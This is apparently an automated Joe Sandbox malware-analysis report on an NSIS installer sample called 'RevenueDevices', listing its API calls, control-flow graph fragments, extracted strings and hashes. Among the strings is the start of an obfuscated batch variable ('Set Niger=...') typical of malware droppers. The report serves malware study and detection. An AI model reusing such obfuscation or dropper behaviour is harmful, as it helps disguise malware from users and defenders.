calls 4978->4979 4980 402399 4979->4980 4983 4071f8 4980->4983 4984 406ed2 25 API calls 4983->4984 4985 407218 4984->4985 4986 407222 lstrcpynW lstrcmpW 4985->4986 4987 4023a7 4985->4987 4988 407254 4986->4988 4989 40725a lstrcpynW 4986->4989 4988->4989 4989->4987 4060 402713 4075 406009 lstrcpynW 4060->4075 4062 40272c 4076 406009 lstrcpynW 4062->4076 4064 402738 4065 40145c 18 API calls 4064->4065 4067 402743 4064->4067 4065->4067 4066 402752 4069 40145c 18 API calls 4066->4069 4071 402761 4066->4071 4067->4066 4068 40145c 18 API calls 4067->4068 4068->4066 4069->4071 4070 40145c 18 API calls 4072 40276b 4070->4072 4071->4070 4073 4062a3 11 API calls 4072->4073 4074 40277f WritePrivateProfileStringW 4073->4074 4075->4062 4076->4064 4990 402797 4991 40145c 18 API calls 4990->4991 4992 4027ae 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027b7 4993->4994 4995 40145c 18 API calls 4994->4995 4996 4027c0 GetPrivateProfileStringW lstrcmpW 4995->4996 4997 402e18 4998 40145c 18 API calls 4997->4998 4999 402e1f FindFirstFileW 4998->4999 5000 402e32 4999->5000 5005 405f51 wsprintfW 5000->5005 5002 402e43 5006 406009 lstrcpynW 5002->5006 5004 402e50 5005->5002 5006->5004 5007 401e9a 5008 40145c 18 API calls 5007->5008 5009 401ea1 5008->5009 5010 401446 18 API calls 5009->5010 5011 401eab wsprintfW 5010->5011 4287 401a1f 4288 40145c 18 API calls 4287->4288 4289 401a26 4288->4289 4290 4062a3 11 API calls 4289->4290 4291 401a49 4290->4291 4292 401a64 4291->4292 4293 401a5c 4291->4293 4341 406009 lstrcpynW 4292->4341 4340 406009 lstrcpynW 4293->4340 4296 401a62 4300 406038 5 API calls 4296->4300 4297 401a6f 4298 406722 3 API calls 4297->4298 4299 401a75 lstrcatW 4298->4299 4299->4296 4302 401a81 4300->4302 4301 4062d5 2 API calls 4301->4302 4302->4301 4303 405e30 2 API calls 4302->4303 4305 401a98 CompareFileTime 4302->4305 4306 401ba9 4302->4306 4310 4062a3 11 API calls 4302->4310 4314 406009 lstrcpynW 4302->4314 4320 406805 18 API calls 4302->4320 4327 405ca0 

                                          Control-flow Graph

                                          [control-flow graph 305; first node 403883-403919]
                                          APIs
                                          • #17.COMCTL32 ref: 004038A2
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                          • API String ID: 2435955865-239407132
                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                          • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                          • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                          Control-flow Graph

                                          [control-flow graph 820; first node 4074bb-4074c0]
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                          • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                          • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                          APIs
                                          • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                          • FindClose.KERNEL32(00000000), ref: 004062EC
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID:
                                          • API String ID: 2295610775-0
                                          • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                          • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                          • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                          Control-flow Graph

                                          [control-flow graph 0; first node 4050cd-4050e8]
                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                          • GetClientRect.USER32(?,?), ref: 00405196
                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                          • ShowWindow.USER32(00000008), ref: 00405333
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                          • CreatePopupMenu.USER32 ref: 00405376
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                          • EmptyClipboard.USER32 ref: 00405411
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                          • CloseClipboard.USER32 ref: 0040546E
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: @rD$New install of "%s" to "%s"${
                                          • API String ID: 2110491804-2409696222
                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                          Control-flow Graph

                                          [control-flow graph 56; first node 405479-40548b]
                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                          • ShowWindow.USER32(?), ref: 004054D2
                                          • DestroyWindow.USER32 ref: 004054E6
                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                          • GetDlgItem.USER32(?,?), ref: 00405523
                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                          • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                          • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                          • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                          • GetDlgItem.USER32(?,00000003), ref: 00405708
                                          • ShowWindow.USER32(00000000,?), ref: 0040572A
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                          • EnableWindow.USER32(?,?), ref: 00405757
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                          • EnableMenuItem.USER32(00000000), ref: 00405774
                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                          • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                          • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                          • ShowWindow.USER32(?,0000000A), ref: 00405910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: @rD
                                          • API String ID: 3282139019-3814967855
                                          • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                          • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                          • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                          APIs
                                          • PostQuitMessage.USER32(00000000), ref: 00401648
                                          • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                          • SetForegroundWindow.USER32(?), ref: 004016CB
                                          • ShowWindow.USER32(?), ref: 00401753
                                          • ShowWindow.USER32(?), ref: 00401767
                                          • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                          • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                          • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                          • SetCurrentDirectoryW.KERNEL32(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                          • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                          • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                          • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                          • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                          Strings
                                          • Rename on reboot: %s, xrefs: 00401943
                                          • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                          • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                          • CreateDirectory: "%s" created, xrefs: 00401849
                                          • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                          • BringToFront, xrefs: 004016BD
                                          • Rename failed: %s, xrefs: 0040194B
                                          • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                          • Call: %d, xrefs: 0040165A
                                          • detailprint: %s, xrefs: 00401679
                                          • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                          • Aborting: "%s", xrefs: 0040161D
                                          • Rename: %s, xrefs: 004018F8
                                          • SetFileAttributes failed., xrefs: 004017A1
                                          • Sleep(%d), xrefs: 0040169D
                                          • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                          • Jump: %d, xrefs: 00401602
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                          • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                          • API String ID: 2872004960-3619442763
                                          • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                          • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                          • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                          APIs
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                          • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                          • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                          • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                          • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                          • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                            • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                          • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                          • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-1650083594
                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • lstrcatW.KERNEL32(00000000,00000000,%NodeTransexual%,004CB0B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,%NodeTransexual%,%NodeTransexual%,00000000,00000000,%NodeTransexual%,004CB0B0,00000000,00000000), ref: 00401AA0
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: %NodeTransexual%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-2490022183
                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00403598
                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                          Strings
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                          • Null, xrefs: 0040367E
                                          • soft, xrefs: 00403675
                                          • Error launching installer, xrefs: 004035D7
                                          • Inst, xrefs: 0040366C
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033E7
                                          • GetTickCount.KERNEL32 ref: 00403464
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                          • wsprintfW.USER32 ref: 004034A4
                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                          Strings
                                          • X1C, xrefs: 0040343C
                                          • ... %d%%, xrefs: 0040349E
                                          • Set Niger=gMoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-lMAAlien-UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-lNCompleted-KRuxInjection-Med-HeTft-Crazy-Sh, xrefs: 004033A9
                                          • X1C, xrefs: 004033ED
                                          Memory Dump Source
